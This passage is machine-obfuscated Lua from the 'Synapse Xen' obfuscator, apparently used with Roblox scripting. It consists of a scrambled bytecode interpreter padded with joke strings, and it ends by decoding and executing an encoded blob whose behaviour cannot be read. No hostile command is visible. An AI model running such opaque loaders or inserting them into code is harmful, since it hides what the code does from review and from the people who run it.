SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1786130797,2508849454)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3666688125]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2288674435,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(4246617630,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{264873246,3401314478,2765841441,2161790801,784000120}return SynapseXen_ilIliiI[3666688125]end)({},{},3871,1701,{}))then local SynapseXen_liIilIlIllIill=SynapseXen_iiIii(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[354431681]or(function(...)local SynapseXen_IiIil="hi my 2.5mb script doesn't work with xen please help"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3830450957,3372262749)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(4253961637,40971906)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[354431681]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(4292903492,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3107756467,SynapseXen_IllIiIili[2]))-string.len(SynapseXen_IiIil)-#{1290432859,1361356339}return SynapseXen_ilIliiI[354431681]end)("lliiil","iIIiIlIillliII",13900,13219,"lllilIliIl",13489),256),SynapseXen_iIIlIiiIiiiIIIi,256)local SynapseXen_llIlIliI=SynapseXen_lIiil;SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill]=assert(tonumber(SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill]),'`for` initial value must be a number')SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+1]=assert(tonumber(SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+1]),'`for` limit must be a number')SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+2]=assert(tonumber(SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+2]),'`for` step must be a number')SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill]=SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill]-SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+2]SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+SynapseXen_illIIilIiIIiIIill[990094981]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[692402037]or(function(...)local SynapseXen_IiIil="pain exist is gonna connect the dots of xen"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3437684567,569710411)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2860092423,1434877888)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[692402037]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(4079699863,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1974284966,SynapseXen_IllIiIili[2]))-string.len(SynapseXen_IiIil)-#{650199574,3118996635}return SynapseXen_ilIliiI[692402037]end)({},{},{},{},"illilIlllIliIiI",3165,2468,"lilliIiI",8195,13200))then local SynapseXen_liIilIlIllIill=SynapseXen_IiilillliiIi(SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[291239603]or(function()local SynapseXen_IiIil="can we have an f in chat for ripull"SynapseXen_ilIliiI[291239603]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2797485475,3175164985),SynapseXen_IiilillliiIi(2669734829,SynapseXen_IllIiIili[5]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{3345807030,187880329,1369359626,3348813068,2427666207,1019193477,1719122445,3731613071,2157188545,2317189261}return SynapseXen_ilIliiI[291239603]end)(),256),SynapseXen_iIIlIiiIiiiIIIi)~=0;local SynapseXen_IiIiilIIliIIlliI=SynapseXen_IiilillliiIi(SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[59187052]or(function(...)local SynapseXen_IiIil="SYNAPSE XEN [FE BYPASS] [BETTER THEN LURAPH] [AMAZING] OMG OMG OMG !!!!!!"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1450483434,1613336802)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2587793030,1707184119)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[59187052]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1734999676,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1310198808,SynapseXen_IllIiIili[4]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{264033034,1586736003,786300194,2438804926,4067534066,193556765,1597835105}return SynapseXen_ilIliiI[59187052]end)("ililiIIillllIiIiil",{},7450,9558,"iIlllilIlilIIiiI",{},{}),512),SynapseXen_iIIlIiiIiiiIIIi)local SynapseXen_llIlillliIl=SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[2298690079]or(function(...)local SynapseXen_IiIil="this is a christian obfuscator, no cursing allowed in our scripts"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3855861487,2738919071)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(308903986,3986052401)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2298690079]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3006325876,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3137897211,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3702000188,44391006,3907146043,1060885919,3485654034,2504497337,3167999101,623789593,441296014}return SynapseXen_ilIliiI[2298690079]end)(1494,{},{},"I","iIIlIII",{},"liliilllIiIl","lIiliIIiiIIIliIiIIi"),512)local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_IiIiilIIliIIlliI>255 then SynapseXen_IiIiilIIliIIlliI=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IiIiilIIliIIlliI-256]else SynapseXen_IiIiilIIliIIlliI=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]end;if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;if SynapseXen_IiIiilIIliIIlliI<SynapseXen_llIlillliIl~=SynapseXen_liIilIlIllIill then SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+1 end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1568519711]or(function(...)local SynapseXen_IiIil="imagine using some lua minifier tool and thinking you are a badass"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(861680411,1471142044)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(186040660,4108951289)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1568519711]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(789819650,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(89438623,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{853453066,980479337,3769715234}return SynapseXen_ilIliiI[1568519711]end)("IlilIIII",{},{},"iIilIIillil",2391,{},"IiiiiiliIlilillil","IIIIl"))then SynapseXen_lIiil[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[1905368379]or(function()local SynapseXen_IiIil="xen detects custom getfenv"SynapseXen_ilIliiI[1905368379]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2692449827,2661056874),SynapseXen_IiilillliiIi(3261085041,SynapseXen_IllIiIili[8]))-string.len(SynapseXen_IiIil)-#{1632327575,1930377681,1905056953,212405841,2469398940}return SynapseXen_ilIliiI[1905368379]end)())]=SynapseXen_lIiil[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[353212024]or(function(...)local SynapseXen_IiIil="HELP ME PEOPLE ARE CRASHING MY GAME PLZ HELP"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3607159982,156784333)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3178700562,1116276706)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[353212024]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1005507438,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2870634435,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{1902143466}return SynapseXen_ilIliiI[353212024]end)("lIlIIl",{},"IiiIIIlIiliiII",{},8672,14069))]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[173439088]or(function(...)local SynapseXen_IiIil="hi xen doesn't work on sk8r please help"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1059528245,2939363215)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(46754117,4248179688)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[173439088]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1714350070,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(919395086,SynapseXen_IllIiIili[6]))-string.len(SynapseXen_IiIil)-#{2303423572,2710341201,683628049,3943602682,515273488}return SynapseXen_ilIliiI[173439088]end)("lIIl","IiIilliliIIIlllil","lliiillIiIIlliI",14637,"Iliii",{},"IilllilII",{},{},"iiIIIll"))then SynapseXen_lIiiIIlIlIllIIiIil[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[3523058013]or(function(...)local SynapseXen_IiIil="xen best rerubi paste"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3852552762,2056703574)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(4177679069,117269333)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3523058013]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(4119129938,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2520411378,SynapseXen_IllIiIili[8]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{3196699788,3789754827,990223203,115981466}return SynapseXen_ilIliiI[3523058013]end)("iIiIIiI",8352))]=SynapseXen_lIiil[SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[2230035691]or(function(...)local SynapseXen_IiIil="HELP ME PEOPLE ARE CRASHING MY GAME PLZ HELP"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1738791236,1062700834)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(319599164,3975386687)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2230035691]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(518561465,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(145843426,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{3337905640,2951218746,3710270269}return SynapseXen_ilIliiI[2230035691]end)("I",{},{}),256)]end end end;local SynapseXen_illlIillllii={...}for SynapseXen_IiliiliIiiIiiIliIlI=0,SynapseXen_IllIlIIiiliiiliiiIIi do if SynapseXen_IiliiliIiiIiiIliIlI>=SynapseXen_IIlIliiiIIiiiIlII[874304623]then SynapseXen_lIiliiIiIIiIil[SynapseXen_IiliiliIiiIiiIliIlI-SynapseXen_IIlIliiiIIiiiIlII[874304623]]=SynapseXen_illlIillllii[SynapseXen_IiliiliIiiIiiIliIlI+1]else SynapseXen_lIiil[SynapseXen_IiliiliIiiIiiIliIlI]=SynapseXen_illlIillllii[SynapseXen_IiliiliIiiIiiIliIlI+1]end end;local SynapseXen_IiIiilIIliIIlliI,SynapseXen_llIlillliIl=SynapseXen_iIllIIiIillIli()if SynapseXen_IiIiilIIliIIlliI and SynapseXen_llIlillliIl>0 then return unpack(SynapseXen_IiIiilIIliIIlliI,1,SynapseXen_llIlillliIl)end;return end end;local function SynapseXen_Iliii(SynapseXen_lIIiiIIlIlIiIIi,SynapseXen_llIll)local SynapseXen_IllIIIlIilI=SynapseXen_iIIllIIII(SynapseXen_lIIiiIIlIlIiIIi)return SynapseXen_liilIIiiiIiIlii(SynapseXen_IllIIIlIilI,SynapseXen_llIll or getfenv(0)),SynapseXen_IllIIIlIilI end;return SynapseXen_Iliii(SynapseXen_iIillIiili("dRtYZW4RAAAAQUdUVklOMVRYU0hMQkFWNwDS+KxOUSdWaAkJiOTVfLXHPyWzgy6FlmCAURMHccqCZliOHArNRQe3JLK4CbJxL3B+oigoHB7bOlh87OOrI6IQHF0lcOlYoJV94lAcXSVn6Rp+4wvIPQNNKS6fn2sIDuKQG10lXOmXTpVyMjBlRmB0n1WpcUfi0BtdJSzp8yyfEMg9A00pV58kRSIKW+JMcP1un0ELFQ2I8o/W0D1OBC6LfkGzJHj1ben10edPiPKP1tBvTs7flAkiFQZdJWDpf1wkM9F5npwDRZ8wP7xd1nSWQj49nx7bTS458QRdiGWfx3mmHYiyj9bQL07rzkAJ5aLyjDlR6acLcXuB8yR49X3pZ2/sfnmxBF2IQp/pji4JiLKM1tBQTmnEkiYQIc/nplDpQzFiSeJQG10lK+lQNItXyD0DTSlynyuNLWnikBpdJXvp0p3FVcg9A00pDJ8QHEFbW6JLcP1Ln6FSPHKI8o/W0BBOMlY0TsG1JHj1NOm+v7hmTbqTszwc6bpCijSBMyR49UbprTV+ULh4B2A/UJ+7TK8uefEEXYgMn5OCdVaIMo3W0BdOcTGNI5Z1lkA+P59sXmRcuHgHYD8Mn5hWmW+iEBpdJUrp8vV8NOJQGl0lLuljTWtHyD0DTSl/nx5U2SXikBldJV3p4gQnCTIwZUZgQZ9igmhcW6JKcP1in+L+8GeI8o/W0CFORymxCk26n7M8Uul4Oqc90XmengN4n2wRRgMiUvVdJUfpTtOcFkk+MHFaYp9qHbANiPKP1tBCTuCuAQBikh9dJVbp94HuIUE0PXj1POlrB0xVotL0XSU/6YT6kU74eAdhPyqfAxtHH1tivcj9SJ9l/w4diLKP1tAQTmzEAxeBMEx49UTpeCZtSS0SBm9iTp9sCpcOYhL0XSUI6URivBOJPrB+WnOfKOzkaeLS9F0lbukG0GBoOHsHYT8Nn/nf8QEQIc/npgTpwuHmWeIQGV0lK+nos947yD0DTSkVn8jeL3ZbIkpw/Q2fso0qPYjyj9bQcU6XmgkuLVKGbGJxn0uBW12I8o/W0GlOY06HCNF5np4DSZ8ENnNyItX0XSUy6b2qyULWdJZCPh6fu4WWBOblGX7Rep/8+iE71naWQT55n5Y0+y54ewdgPzSfsaJpODoxF32ADZ/9pUxOSfFPfloanzQ0/FiilfNdJRHpeCXgbckxMHxaFJ8KSM06ItT0XSVQ6VI2FmZ4+gdhPyOf7hMqbvh7h2A/CZ/yDMlSubIEXYgPn0HjO1OIso/W0CVOk24nFjoxl3qAWJ+j0Y5xpuaZfNEln40bXgB58gRdiEqfLNwRAYhyi9bQN04vxaMrW6K20P1Jn+BBcwiI8o/W0AdOLsgtSWLV810lYOnLoSl8iPKP1tAHTp0O+lyNvZGzPGjpWahDP9F5Hp8DIp9goZ8Y1nSWQj4cn2sySgOJMbB8WkifEORMLhChzuemN+l5thNj4pAYXSVP6ZymNUQyMGVGYDifNAYvTOLQGF0ldekR1Q4nMjBlRmAVn7rCTmNb4klw/Vaf2OzMQoiyj9bQEk7RTVkN0XmenwMDnw0vGRni1fRdJSHpw3nwZTh6B2E/JJ98eHEMVnYWRz4znxJ8zgeIMo7W0AVOVoJDJ2IV810lZukWW+ksiTGwfFpqn7QIO1CIso/W0DBOd03IDEF1MHj1eekpnPhU4tX0XSUp6UD6L3c4egdhP0if/b5+Z1Z2Fkc+Mp8Ai09zifFOflpyn6q2OX2Wd5ZHPhOflFKYYDj6BmE/M5+57SF9iDKP1tAlTpMItkT58QRdiEqfmScfW4iyj9bQO05sU+YJFnWWRT53n+DhhDYqehBiXF6fc04FPIgycSnQe04QjrwvpeTyjDld6YyPwifWdJZBPl2f8+X8C9Z3Fkc+YZ/4y9wkeHoHYD92n66+8QgJ8E58Wmmf2Mm/ARZ3lkc+GZ8fyrwbuPoGYT9En4hxOxyIMo/W0GdOlncnLhsiZXj9c5/usT0niLKP1tB5Ts/NjVKIMnAp0FROJJiDCKp6EGJcAZ/vFfEhiDJxKdBiTu5vMQ8JpWRyqRSfXA1WJlvivMP9FZ8OMS1DiLKP1tB2TkC8Em3ReR6RA3yfWoMWGUGzIXj1Cum9OkkKWyJL0v0VnzKewGaIso/W0BtOOqF+btF5npEDaZ9b/YEqrdPEb2ITn/JxsSPiE/JdJSvpHoBQLnh4h2E/Fp9LBk4fW2K52f0inzInAUmIso/W0ENO4xeVN6IQ9F0lQunc9ZgogbMhePVb6XeY6lTt00RvYiWfKnKdOyJS8l0lKem+/qxSuHiHYT8Qn+xmfFCIso/W0HNOvX5vJtF5HpgDC5/jJaIswbMhePUf6Qy5bysQIXbkphLpBirEXOJQGF0lGOlrV3IMMjBlRmALnw5qlwrikBddJWjprcLYKcg9A00pdJ+Z1CBe4tAXXSV26bqQizQyMGVGYHiflYpjdVviSHD9A597h55MiPKP1tB/TnS6kD4t0sRsYiqfuEBwU4jyj9bQPU7q9SU1Dfylszxk6byQI1pN+6yzPD3pP0muSNZ0lkI+Xp9fd0kZolAXXSU36TC/FW3ikBZdJRjpiwBffsg9A00pDp8mMilr4tAWXSUN6aHEFEbIPQNNKTCf15TfNlviR3D9K58c2Vc4iPKP1tA/TloLiTFikvFdJV/pZnTPR4iyj9bQRE5fRJV0DTynszxa6YGwxxrWdJZCPkyfhIizJvh4h2E/Jp8LPQlNiPKP1tACTtFSQ0zikAZdJW3pO+0EXY2/mbM8eOny40I+AbIhePVO6bAgNEOiUBZdJSzpJHh+T+KQFV0lcukFm+gHyD0DTSlGn/PukHhbokZw/SWflFJvDYjyj9bQaE4SWmg9bdJEbGIcn/Sv+0iIso/W0BJO+Z/LcdF5npkDE5/4qSsM1nSWQj5Vn1Z9iRyi0vFdJRXpuIQKSTh7h2E/bp+itYtDQbIhePVM6ddkfBCIso/W0EZOZj0OS0HyM3j1e+nCmVlCrdLEbWJ9n+k1HjBboiTx/U2fkM5Xcoiyj9bQaE5CjX5oYhMCXSUM6TOOUnDiEvFdJT7pPKMDWHh7h2E/AZ+2kxxMgbIhePVO6W8npUxboibF/TKfJu6WD4iyj9bQCk78iZhdAbU8ePU66dMMsxDt0kRtYjifwVmPYSIV8V0lB+nzuuFbuHuHYT8on5oJyAVb4rXS/VSfR064aIjyj9bQA056cCxiTfuuszxB6cAc+3qikwVdJXzpYwqVY8GyIXj1EOmHMSI4ECF25KZv6WcGrCniEBVdJWDpPn9fKjIwZUZgZZ8srEwjWyJGcP1Nn2sUNn2I8o/W0BpOW3pZSSLX8V0leunMp/Qh0XkekQMRnwBBszwt1cRqYgWfQvvoaFuivOL9EJ/rRi1riLKP1tAJTqvU3hvNfJCzPCjpY9HHcWJV8l0lSenq/ERi+HuHYT8Tn+qGWyMQIc7npm3pjcWzXOKQFF0lFul+/coGMjBlRmBPn9WVEWvi0BRdJTzpiBdlejIwZUZgH58krQNh4hAUXSV86Uyxyw/IPQNNKSqfRWxXFVsiRXD9FJ8nIZUKiPKP1tBBToRbc18BtSF49QvpqKmlMojyj9bQV079B4FGzf2Vszxc6YIafljiEAhdJWrpSVSDEdZ0lkI+WZ97TyJ0bdVEamIPn1b89n2ilfFdJWDphKypfjh6h2E/Fp/dQ1xCQbUhePU26WGul3Ct1cRrYmafmWX4E1uiyu39eZ+pTlIPiPKP1tBlTglVnxaBs0x49RzpJgTJJNF5HpgDbJ+QWxcB4tXxXSVA6QsVXnR4eodhPwefL9+9HaKQE10lMOkrnRdq4tATXSVW6SWSPmEyMGVGYEufOD2dJlviRHD9AJ/0ch4+iPKP1tAcTjik6D2BtSF49RHpzLOBSIjyj9bQak4UJOEhgbM1ePUA6Qc0AH7BdT149XnpLf6eaNZ0lkI+X59wN6wjEOHO56Yj6UPyJS3iUBNdJWXpcdYRfMg9A00pTZ+sjBRB4pASXSUp6Qm7ljcyMGVGYGyfVLQAaVuiQ3D9UZ8GdIFliPKP1tBsTgFSEXLt1URrYk2finAJdojyj9bQJ05KsTw1AbI8ePV26b4pkQ9N/YGzPHDpABR7KNZ0lkI+d5+h3QQ8iLKP1tB+TrfwzhxBtDl49SzpgPz5eiIU8V0lI+mt5j5uuHqHYT8Hn7IGk1cQIXbkphXpaLfuY+IQEl0leelEh4MDyD0DTSkEn10Bz1riUBJdJRPpiBiTCsg9A00pfJ9US71IW2JDcP1Rn0Q5sjOI8o/W0GxOvJiwK026vrM8W+lVlIR4gbJIePVU6eMu2Qq+canw5VafkbwTRME1P3j1cemQ25dPSfBLfVoznzGGgHuilA9dJTXpCfyAKfh6B2E/fZ9tFIYwW6K47P0Vn+fqqy6I8o/W0BNOHhkAfr7x6vPlYZ+1SL55iPKP1tBQTjqpmAiiEBddJXjpi/vJSaKTFV0lcelX0/lM1nSWQj4hnyCGIWxbIjPh/RKfr1yGJ4jyj9bQVk67PpNDjfukszxP6Smpb1LReZ6ZA0CfW9qEM/6xp/DlJp/VNQ0ZW+Iixv0YnyIxs0OIso/W0GVOLDSdRQ28gLM8MOnKvkF+/nHt8+VNn3fHEFuIso/W0FxOk3hjY9F5np8DdZ/oaktOwXU+ePU16Qha31NbYjLa/VKfGQzZcojyj9bQW07vqWFTLZTAaGIAn7mlyQqIso/W0BlO+4s9CeJVF10lIulk2cgF1nSWQj48n70y4gsQoc7npiTphztNcuLQEV0lWuli64ErMjBlRmBvn59DhmFb4kJw/QifeyCjeojyj9bQZU5+lYYdYtQOXSUU6R0wrwqI8o/W0FhOOU4NetF5HpoDfJ+S5WYWwXNIePVw6bWr7z3WdJZCPnafBWlORKLUDl0lcunQRrwC4tQOXSVx6bd8lFz4eodiP3efnfNybf7xavTlM5+DtZwbW6Kg/P1/n2D7yQ6I8o/W0CBOyc3fX8F1Pnj1COk/9aMkiPKP1tBZTnjRVVvReR6YAwCfb4FbMcE1R3j1c+nttgEU1nSWQj5Gn4fUaToQIXbkpm3pJd3xNOJQEV0lXulVBLVQMjBlRmB7nxc5KAbikBBdJQ7pR5z6Asg9A00pGZ+S7NBkW6JBcP0Pn5yer3iIso/W0BlOiZ4oItF5HpsDAZ9/9n59LZTAaGI0n0KDPgJi1A5dJS7pJ9qobIiyj9bQek5jli5XTf+Bszx86b7TNTSi1A5dJQLp/otuM+LUDl0lIOkSHdEg+HqHYj8VnxblwD4QIc/npkrpptSXYuIQEF0lfukkkw84yD0DTSkUn/LuKDziUBBdJX3pYXBWJjIwZUZgcp/zGSctW2JBcP0Mn7QXsXyI8o/W0HVOR6whPP7xavblUJ/tje8PiPKP1tALTug6NDeBMj149VrpwF1+A9F5npEDfJ9xfnNx1nSWQj5lnxUBXVlbIs/f/T+f4TG4Fojyj9bQOE7Tlo0qwbU8ePVO6bOc4EeIso/W0GVOG5rRbYEwInj1beleQGBa1nSWQj4anyl5lyyi0C9dJXrp7DdZYeIQL10lDel9gAlFMjBlRmB/n0oGIA7iUC9dJRDpotYPATIwZUZgX5/KVEZ+4pAuXSVh6VxQckDIPQNNKWOfpXUgcluiX3D9KJ/fOXxpiPKP1tBGTpIz6xEt1MRoYkGfjyvKWIjyj9bQfE6yjOskjb+tszx46alMHX6iUhNdJQPpUntDU9Z0lkI+V5